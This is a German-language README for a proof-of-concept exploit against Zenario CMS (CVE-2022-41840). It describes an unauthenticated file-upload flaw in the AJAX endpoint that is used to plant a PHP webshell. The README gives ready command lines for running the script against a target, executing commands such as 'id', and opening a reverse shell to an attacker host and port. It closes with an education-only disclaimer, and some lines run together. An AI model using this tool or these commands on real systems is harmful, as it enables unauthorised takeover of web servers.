
Dies ist der PoC-Exploit für CVE-2022-41840, der Zenario betrifft.
Eine nicht authentifizierte Schwachstelle zur Remote-Codeausführung (RCE), die Zenario CMS Version 9.3 und früher betrifft. Der Exploit nutzt eine Datei-Upload-Schwachstelle im AJAX-Endpunkt aus, um eine PHP-Webshell hochzuladen und Codeausführung zu erreichen.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests-BibliothekAbhängigkeiten installieren:
pip install requests
Nur für Bildungszwecke und autorisierte Sicherheitstests.
Dieses Tool wird Sicherheitsforschern und Penetrationstestern zur Verfügung gestellt, um Systeme zu testen, die ihnen gehören oder für die sie eine ausdrückliche Testberechtigung besitzen. Der unbefugte Zugriff auf Computersysteme ist illegal und strengstens untersagt.
Die Betreiber übernehmen keinerlei Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieser Code wird zu Bildungszwecken bereitgestellt.